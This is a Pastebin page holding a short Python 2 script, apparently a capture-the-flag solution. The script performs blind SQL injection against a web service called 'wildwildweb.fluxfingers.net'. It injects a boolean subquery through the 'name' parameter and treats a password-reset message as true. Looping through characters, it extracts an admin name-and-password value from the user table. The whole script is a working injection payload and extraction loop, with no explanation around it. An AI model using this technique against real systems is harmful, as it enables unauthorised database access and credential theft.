Need a unique gift idea?
A Pastebin account makes a great Christmas gift
SHARE
TWEET

Untitled

mage_1868 Oct 24th, 2014 (edited) 46 Never
Upgrade to PRO!
ENDING IN00days00hours00mins00secs
 
  1. # coding: utf8
  2.  
  3. import urllib
  4. import urllib2
  5. import string
  6.  
  7. def blind(sql):
  8.     opener = urllib2.build_opener()
  9.     request = urllib2.Request('https://wildwildweb.fluxfingers.net:1424/?name=' + urllib2.quote(sql))
  10.     response = opener.open(request)
  11.     return 'A new password was generated and sent to your email address!' in response.read()
  12.  
  13. if __name__ == '__main__':
  14.     flag = ''
  15.  
  16.     while True:
  17.         find = False
  18.  
  19.         for c in '_$' + string.ascii_letters + string.digits:
  20.             test = flag + c.replace('_', r'\_')
  21.  
  22.             if blind("' != (select 1 from user where concat(name, passwd) like binary 'adminflag{" + test + "%}' limit 1)#") == True:
  23.                 print 'find: ' + flag + c
  24.                 flag = test
  25.                 find = True
  26.                 break
  27.  
  28.             print test
  29.  
  30.         if find == False:
  31.             break
  32.  
  33.     print flag
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top